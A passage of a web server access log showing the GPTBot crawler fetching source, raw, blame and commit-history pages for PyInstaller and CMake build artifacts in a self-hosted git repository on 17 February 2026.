(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs" -[17/Feb/2026:14:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11038] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:14:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11039] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:14:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51201] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" -[17/Feb/2026:14:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23980] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23979] [Gzip 15.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:14:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10771] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:14:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:14:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 60211] [Gzip 16.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 26716] [Gzip 20.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PKG-00.toc" -[17/Feb/2026:14:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:14:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10376] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:14:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:14:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:59:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:14:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11281] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:14:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10071] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16049] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:14:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:14:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14343] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73581] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 